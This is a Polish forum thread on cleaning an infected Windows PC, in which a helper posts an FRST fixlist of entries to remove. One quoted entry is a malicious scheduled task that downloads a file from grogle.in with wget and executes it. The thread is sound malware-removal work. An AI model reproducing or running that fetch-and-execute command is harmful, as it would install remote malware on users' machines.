Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Jak się uporać z zainfekowanym systemem.

Rymu 25 Sie 2015 18:40 438 3
  • #1 25 Sie 2015 18:40
    Rymu
    Poziom 5  

    Witam, mój brat pobierał rożne programy z Rosyjskich serwerów i mam teraz mnóstwo wirusó polecono mi wykonać następujące czynności

    1. Pobierz Adwcleaner i przeskanuj cały system. Usuń potencjalne zagrożenie i cały ten syfl
    2. Pobierz Malwarebytes i przeskanuj cały system. Usuń wszystkie wyszukane wirusy.
    3.Pobierz Farbar Recovery Scan Tool odpowiedni dla Twojego systemu (patrz na architekturę 32/64 bit). Zrób scan i pliki wytworzone przez skan wyślij na forum elektrody (pogotowie wirusowe->Stwórz nowy temat->Załącz pliki).

    Tak więc wykonałem je i wrzucam wam dwa pliki tekstowe które zostały mi po skanowaniu. NIe wiem który wrzucić więc wrzucam oba

    0 3
  • #2 25 Sie 2015 18:57
    Acorus 20
    Spec od komputerów

    Odinstaluj MyBestOffersToday 008.014010065. Otwórz notatnik systemowy i wklej:

    Cytat:
    CustomCLSID: HKU\S-1-5-21-4134114945-97773927-3357020433-1000_Classes\CLSID\{A75BE48D-BF58-4A8B-B96C-F9A09DFB9844}\InprocServer32 -> %LOCALAPPDATA%\Pokki\ocdeskband_0.dll Brak pliku
    CustomCLSID: HKU\S-1-5-21-4134114945-97773927-3357020433-1000_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\Admin\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll Brak pliku
    Task: {329CF3F7-5E5E-476C-9C87-726C385B7880} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" &amp; ping 1.1.1.1 -n 300 -w 1000 &amp; wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=ga27abBxk8;camtasia.exe;1423426882 &amp; start cmd /R dat.bmp <==== UWAGA
    Task: C:\Windows\Tasks\AGVyvjP0DHI6eVNFCsfo.job => C:\Users\Admin\AppData\Roaming\AGVyvjP0DHI6eVNFCsfo.exe <==== UWAGA
    HKU\S-1-5-21-4134114945-97773927-3357020433-1000\...\Run: [Akamai NetSession Interface] => C:\Users\Admin\AppData\Local\Akamai\netsession_win.exe [4691384 2015-07-23] (Akamai Technologies, Inc.)
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2015-05-26]
    ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.149\SSScheduler.exe (McAfee, Inc.)
    ShellIconOverlayIdentifiers: [GGDriveOverlay1] -> {E68D0A50-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll Brak pliku
    ShellIconOverlayIdentifiers: [GGDriveOverlay2] -> {E68D0A51-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll Brak pliku
    ShellIconOverlayIdentifiers: [GGDriveOverlay3] -> {E68D0A52-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll Brak pliku
    ShellIconOverlayIdentifiers: [GGDriveOverlay4] -> {E68D0A53-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll Brak pliku
    GroupPolicy: Zasady grupy Chrome wykryto <======= UWAGA
    SearchScopes: HKU\S-1-5-21-4134114945-97773927-3357020433-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    CHR Extension: (bnomihfieiccainjcjblhegjgglakjdd) - C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\bnomihfieiccainjcjblhegjgglakjdd [2015-08-25]
    CHR Extension: (Brak nazwy) - C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\lkadffjmnaiokkdncgdlecdegajoiemi [2015-08-20]
    CHR HKLM\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - https://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - https://clients2.google.com/service/update2/crx
    OPR StartupUrls: "hxxp://www.istartsurf.com/?type=hp&ts=1438198601&z=75ea9e244b74c93657bd5ecg2z6c2b4g1t3bfw7w1e&from=cor&uid=WDCXWD5000AZRX-00A8LB0_WD-WCC1U476123061230"
    S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.149\McCHSvc.exe [289256 2015-06-26] (McAfee, Inc.)
    S3 NBService; C:\Program Files (x86)\Nero\Nero 7\Nero BackItUp\NBService.exe [X]
    S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
    S3 VGPU; System32\drivers\rdvgkmd.sys [X]
    2015-08-25 10:11 - 2015-08-25 17:42 - 00000000 ____D C:\AdwCleaner
    2015-04-14 18:28 - 2015-04-14 18:28 - 0004387 _____ () C:\Users\Admin\AppData\Roaming\AGVyvjP0DHI6eVNFCsfo
    EmptyTemp:


    Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze.
    Uruchom jako administrator FRST i kliknij w Fix.

    0
  • #3 25 Sie 2015 19:16
    Rymu
    Poziom 5  

    Nie wiem za bardzo gdzie znaleźc ten plik żeby go odinstalować

    0
  • Pomocny post
    #4 25 Sie 2015 20:16
    Acorus 20
    Spec od komputerów

    Pomiń to i wykonaj resztę.

    1